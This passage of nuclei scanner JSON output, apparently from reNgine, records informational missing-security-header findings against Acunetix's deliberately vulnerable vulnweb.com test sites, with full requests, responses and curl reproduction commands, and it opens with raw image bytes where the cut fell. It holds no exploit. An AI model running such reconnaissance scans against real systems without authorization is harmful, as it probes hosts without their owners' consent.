\\ufffdq\\ufffd\\ufffd\\u0000!\\ufffd\\ufffdQ\\ufffd\\ufffd\\ufffdY\\ufffdw+\\ufffd\\ufffd\\u0012\\ufffd,)X\\ufffda`6\\ufffd\\u0018\\ufffd\\ufffd*x\\ufffd1\\u0014K\\ufffdZ\\ufffd\\ufffd\\u0007\\ufffdz\\ufffd,\\ufffd\\ufffdHS\\u0004\\ufffd)\\u0006\\u000c\\ufffdG\\u0001 \\ufffd\\ufffd\\ufffd\\u0018\\ufffd\\ufffdıD\\ufffd\\ufffd\\ufffd*ԭZ\\u00007\\ufffd\\ufffd\\u0015\\ufffd\\ufffd\\\\=\\t’\\ufffdR-\\ufffd\\ufffd\\ufffd\\u0010]\\ufffdh\\ufffd\\ufffd]~T\\ufffd\\ufffde(Ő\\u0005\\ufffdp\\ufffd\\ufffd\\ufffd\\u0004\\u0003\\ufffd\\u001a\\ufffd*+2kZ\\ufffd\\u0015Z\\u0000D\\u0014\\u0008\\ufffdYB9V\\ufffdp\\u0002L\\ufffdԤ\\ufffd\\ufffdIWn\\ufffd\\ufffd\\u0016\\ufffd\\ufffdm\\u0026@\\ufffd\\ufffdL\\ufffd37\\u001a\\ufffd\\ufffdRX)YЂ)\\ufffd\\ufffd \\tN\\u001eop\\ufffd/\\ufffdR\\ufffd\\ufffd\\u000eGF\\ufffdDhF\\ufffd6:\\ufffdM2ѻ\\ufffd[\\ufffd\\ufffd\\u0001SZ\\u0012\\ufffdǺ\\ufffdC\\ufffdAkv\\ufffd\\ufffdQ\\r\\ufffd\\u0018:\\ufffdH\\ufffd\\ufffdD*]\\ufffdU\\ufffdH\\n\\ufffdII\\u0013\\u001bH\\u001e\\u0015\\ufffdnQn-`(\\ufffd\\ufffd\\ufffd\\ufffdG\\u0010\\ufffd\\u0013\\ufffdv\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffd5a\\u0017\\ufffdD\\ufffd\\ufffd\\u0000\\ufffd\\ufffdu\\ufffd\\ufffd\\ufffdx\\ufffd\\u0008y\\ufffd\\ufffd\\ufffd\\u0000\\u0002#\\ufffd\\ufffd\\u001bT\\ufffd\\ufffdJ\\ufffdz\\ufffd\\u0007Q\\ufffd\\ufffdc_\\ufffdY%L(%o\\u0010hu\\ufffd7\\tZb\\u0012\\ufffd\\\"u\\ufffd\\ufffdH\\ufffdTn\\\\\\ufffdܽVT\\u0015+\\ufffd\\n\\ufffd\\u0012\\u000e\\ufffd\\ufffdX\\ufffd踸jє\\ufffd\\u001a\\ufffd~\\ufffd뫺ZD\\ufffd\\ufffd\\ufffdc0\\u0004\\u001f\\ufffdW\\ufffdd.\\ufffd\\ufffdIq3m`\\ufffd\\ufffdc9\\u0019\\u001bo\\ufffd\\ufffdY\\u003eC\\ufffd\\ufffd\\ufffd-\\ufffd%\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffd'X'\\ufffdO\\ufffd\\ufffd[\\ufffd\\ufffdn\\ufffdajNl\\ufffd\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffd:V\\ufffd\\ufffdʄ'a\\ufffdkm$\\ufffd\\u001e\\ufffd\\ufffdS\\u0002\\ufffdy\\ufffd\\u0015\\u0003A\\ufffd_€a\\ufffd.\\ufffd\\u0001\\ufffd!#\\ufffd\\ufffd\\ufffdJ\\ufffdI\\ufffdN\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdg \\ufffdGuk\\ufffdq`\\u0010\\ufffd\\ufffd-\\ufffd/1\\n'y\\ufffd\\ufffd/4\\ufffd25\\u0006x\\ufffd\\u0014\\ufffd\\ufffd\\u0010u\\ufffd\\u001ba\\ufffd`%:\\ufffdG\\u00045\\ufffd3j\\ufffd\\ufffdH8\\ufffd\\ufffd\\u0004\\ufffd\\u0000\\ufffdPU\\ufffd'¶1|=~\\ufffd\\ufffd[Z\\u0003-\\ufffd\\ufffd\\ufffd:\\ufffdy\\ufffd\\ufffd\\ufffd\\u001d\\u0012e-\\u0002\\ufffd$\\ufffd\\ufffd \\rD\\ufffdυ[\\ufffdR\\ufffdc\\r-)!\\u000f9\\ufffdW08\\u0008\\ufffd|\\ufffd\\u0014\\ufffd7VȄX\\u0026(ղ\\ufffds\\u0002\\u0008%*\\ufffd\\u001fޝ\\ufffd\\\\e\\u0018\\ufffd\\ufffdWn\\ufffd\\ufffd\\ufffdO\\u003e:\\ufffd\\ufffd\\ufffd\\u0026\\ufffd\\n\\u001c$fȭ\\ufffd\\ufffd@\\ufffd\\u0002\\ufffd (F\\ufffd)\\ufffd˽Ir\\u0017$\\ufffd٣qg\\n\\ufffd\\ufffd\\u0019\\ufffd\\u001b\\ufffd\\ufffd\\ufffd\\ufffd\\u0000T\\ufffd\\u000c\\u001f\\ufffd\\u001c\\ufffd6\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd(\\ufffd\\ufffd'.i\\ufffd׉\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdʙ\\ufffd;q\\ufffd\\ufffdS\\ufffd\\ufffd\\ufffdFRM\\ufffdJ\\ufffdR\\t\\ufffd\\u001b\\ufffd\\u001fÊ\\ufffd*\\u0000\\ufffd\\ufffd\\ufffd0EJ\\ufffd\\ufffd\\u0000\\ufffd\\ufffd \\u000eU\\ufffd\\u0002\\ufffd\\tY\\ufffd䟥[w\\ufffd\\n\\ufffd\\u0000Ӑ\\ufffdP\\ufffd\\ufffdW\\t5\\ufffd\\ufffd6\\ufffd\\u0001eAGI\\u001a\\u0011\\ufffdUD)eq$\\ufffdw\\ufffd|\\ufffdVR\\u0012\\ufffd\\u0008\\ufffdt\\\"L\\ufffdƄ\\ufffd\\ufffd\\t\\ufffdڛ\\ufffd\\ufffdL\\ufffds\\u001e4\\ufffd|\\ufffd\\ufffd\\u0001\\u0000\\u0001\\ufffd\\u0001\\ufffd\\ufffd\\ufffdJ\\ufffd2\\ufffdG7*\\ufffd\\ufffd\\ufffd\\ufffd\\u0026\\u000e\\ufffd\\nT\\ufffd\\ufffd\\u003c\\u0012\\ufffd\\ufffd\\ufffd\\ufffdvaCj\\ufffd\\ufffd\\ufffd\\ufffd*p\\ufffd\\ufffd\\u001b\\ufffd#\\ufffdTEڒ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdM\\u000f=\\ufffdB\\ufffd'bi\\ufffd)?\\u00029\\ufffdy-\\ufffd.V\\ufffd\\ufffd\\ufffd\\u0004\\ufffd́\\ufffd\\ufffd\\ufffd]\\ufffd:\\ufffd\\u0015\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffd\\ufffdrgi֚\\ufffd\\u001f\\ufffd\\ufffdU\\ufffd\\ufffd:xҚ\\u0007\\ufffd\\u0012\\ufffdp\\ufffdУ\\ufffdS\\ufffd\\rj\\ufffdM\\ufffd\\ufffd\\ufffd\\u0006\\ufffdx\\u0011\\ufffdR\\ufffdO\\ufffduQ\\u003c\\ufffdY\\ufffd\\u0014\\ufffd\\ufffdJ\\ufffdO}3\\ufffdQ\\ufffd懲\\u0015\\ufffdҖ\\u0000H\\u0003\\ufffd\\ufffdL٥e!*\\ufffdxD\\ufffda\\t#:\\t\\ufffd\\ufffd\\ufffdJ\\ufffd\\u0010\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\u0026*\\ufffd)\\\"\\ufffd(ˆ\\u0014aL\\u000b\\u001bR\\ufffd\\ufffd\\u001a\\ufffd\\u0010A(\\u003cx\\ufffd\\ufffdP\\ufffdJ\\ufffdUqrd\\ufffd5#6\\ufffd'\\ufffdZ\\r::\\ufffd\\ufffd\\u0010L\\ufffdsN\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffdw\\ufffd\\ufffd²z\\ufffdm*\\ufffd4\\ufffd\\u00007\\u0026\\u0016gp5=\\ufffd\\ufffdR\\ufffd\\ufffd*A\\ufffdP\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffd\\ufffdي\\ufffdՙ\\ufffd*%i@$\\ufffd`i\\ufffdk!\\ufffd!S\\u001a\\ufffd|\\ufffdҥ\\\\\\ufffd\\u000e\\ufffd\\ufffd$\\u0014\\ufffd\\u0002t\\ufffdj\\u00022\\ufffd@m R\\ufffdW\\ufffd1f̤\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\u0017\\ufffd\\u0012\\ufffd\\ufffdp\\ufffd\\ufffdJ\\ufffd\\u0008Ե(\\ufffdcz\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdiR\\ufffdPV\\ufffd\\u000c\\ufffdy%m\\ufffd\\ufffd\\ufffd\\u001fqS%\\u00031\\u001e?*T\\ufffd\\u003eE\\u0011\\u00039\\u0011\\ufffd\\u003e\\ufffdj\\ufffd\\t\\ufffd\\u003e\\ufffdR\\ufffdQ\\u0001\\ufffdN\\ufffd\\u0014\\ufffdz\\ufffd@ޕ*Ҹ2ˑ\\ufffd\\u00026\\u001bTKBH:R\\ufffdQ\\ufffd\\u001c[I))\\u0012\\u0007q\\ufffdLI\\u0001\\u000f\\u00109q\\ufffdJ\\ufffd\\ufffd\\ufffdj\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffdP\\ufffd\\ufffd\\\\P\\u0011=\\ufffd\\ufffdUf\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:47.330801504Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/8.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"www.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://www.vulnweb.com\",\"matched-at\":\"http://www.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: www.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:26 GMT\\r\\nEtag: W/\\\"5f1fedf1-fb2\\\"\\r\\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Transitional//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\\\"\\u003e\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=utf-8\\\" /\\u003e\\n\\u003ctitle\\u003eAcunetix Web Vulnerability Scanner - Test websites\\u003c/title\\u003e\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\n\\u003c!--\\n@import url(\\\"style.css\\\");\\n--\\u003e\\n\\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n\\n\\n\\u003ccenter\\u003e\\n\\u003cbr\\u003e\\n\\n\\u003ca href='https://www.acunetix.com/'\\u003e\\u003cimg src='acunetix-logo.png' border='0' alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\n\\u003cdiv\\u003eVulnerable test websites for \\u003ca href='https://www.acunetix.com/vulnerability-scanner/'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\u003c/div\\u003e\\n\\n\\u003ctable id=\\\"one-column-emphasis\\\" summary=\\\"Acunetix test websites\\\" style=\\\"width:60%\\\"\\u003e\\n \\u003ccolgroup\\u003e\\n \\t\\u003ccol\\u003e\\n \\u003c/colgroup\\u003e\\n \\u003cthead\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eName\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eURL\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eTechnologies\\u003c/b\\u003e\\u003c/th\\u003e\\n\\t\\t\\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eResources\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/thead\\u003e\\n \\u003ctbody\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eSecurityTweets\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testhtml5.vulnweb.com/'\\u003ehttp://testhtml5.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003enginx, Python, Flask, CouchDB\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'\\u003eReview\\u003c/a\\u003e Acunetix HTML5 scanner or \\u003ca href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuart\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testphp.vulnweb.com/'\\u003ehttp://testphp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix PHP scanner or \\u003ca href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuforum\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testasp.vulnweb.com/'\\u003ehttp://testasp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'\\u003eReview\\u003c/a\\u003e Acunetix SQL scanner or \\u003ca href='https://www.acunetix.com/websitesecurity/sql-injection/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcublog\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testaspnet.vulnweb.com/'\\u003ehttp://testaspnet.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP.NET, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix network scanner or \\u003ca href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n\\t\\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eREST API\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://rest.vulnweb.com/'\\u003ehttp://rest.vulnweb.com/\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003eReview\\u003c/a\\u003e Acunetix scanner or \\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/tbody\\u003e\\n\\u003c/table\\u003e\\n\\n\\u003cdiv style=\\\"background-color:lightgray;width:60%;text-align:center;font-size:14px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:140px;padding-right:140px\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/center\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:47.664816969Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://www.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://vulnweb.com\",\"matched-at\":\"http://vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:26 GMT\\r\\nEtag: W/\\\"5f1fedf1-fb2\\\"\\r\\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Transitional//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\\\"\\u003e\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=utf-8\\\" /\\u003e\\n\\u003ctitle\\u003eAcunetix Web Vulnerability Scanner - Test websites\\u003c/title\\u003e\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\n\\u003c!--\\n@import url(\\\"style.css\\\");\\n--\\u003e\\n\\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n\\n\\n\\u003ccenter\\u003e\\n\\u003cbr\\u003e\\n\\n\\u003ca href='https://www.acunetix.com/'\\u003e\\u003cimg src='acunetix-logo.png' border='0' alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\n\\u003cdiv\\u003eVulnerable test websites for \\u003ca href='https://www.acunetix.com/vulnerability-scanner/'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\u003c/div\\u003e\\n\\n\\u003ctable id=\\\"one-column-emphasis\\\" summary=\\\"Acunetix test websites\\\" style=\\\"width:60%\\\"\\u003e\\n \\u003ccolgroup\\u003e\\n \\t\\u003ccol\\u003e\\n \\u003c/colgroup\\u003e\\n \\u003cthead\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eName\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eURL\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eTechnologies\\u003c/b\\u003e\\u003c/th\\u003e\\n\\t\\t\\t\\u003cth scope=\\\"col\\\"\\u003e\\u003cb\\u003eResources\\u003c/b\\u003e\\u003c/th\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/thead\\u003e\\n \\u003ctbody\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eSecurityTweets\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testhtml5.vulnweb.com/'\\u003ehttp://testhtml5.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003enginx, Python, Flask, CouchDB\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'\\u003eReview\\u003c/a\\u003e Acunetix HTML5 scanner or \\u003ca href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuart\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testphp.vulnweb.com/'\\u003ehttp://testphp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix PHP scanner or \\u003ca href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcuforum\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testasp.vulnweb.com/'\\u003ehttp://testasp.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'\\u003eReview\\u003c/a\\u003e Acunetix SQL scanner or \\u003ca href='https://www.acunetix.com/websitesecurity/sql-injection/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eAcublog\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://testaspnet.vulnweb.com/'\\u003ehttp://testaspnet.vulnweb.com\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eIIS, ASP.NET, Microsoft SQL Server\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'\\u003eReview\\u003c/a\\u003e Acunetix network scanner or \\u003ca href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n\\t\\t\\u003ctr style=\\\"font-size:14px\\\"\\u003e\\n \\t\\u003ctd\\u003eREST API\\u003c/td\\u003e\\n \\u003ctd\\u003e\\u003ca href='http://rest.vulnweb.com/'\\u003ehttp://rest.vulnweb.com/\\u003c/a\\u003e\\u003c/td\\u003e\\n \\u003ctd\\u003eApache, PHP, MySQL\\u003c/td\\u003e\\n\\t\\t\\t\\u003ctd\\u003e\\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003eReview\\u003c/a\\u003e Acunetix scanner or \\u003ca href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'\\u003elearn more\\u003c/a\\u003e on the topic.\\u003c/td\\u003e\\n \\u003c/tr\\u003e\\n \\u003c/tbody\\u003e\\n\\u003c/table\\u003e\\n\\n\\u003cdiv style=\\\"background-color:lightgray;width:60%;text-align:center;font-size:14px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:140px;padding-right:140px\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/center\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:47.664832972Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36' 'http://vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/wvstests\",\"path\":\"/wvstests\",\"matched-at\":\"http://testphp.vulnweb.com/wvstests/\",\"request\":\"GET /wvstests HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:27 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /wvstests/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /wvstests/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"pmwiki_2_1_19/\\\"\\u003epmwiki_2_1_19/\\u003c/a\\u003e 08-Apr-2013 08:44 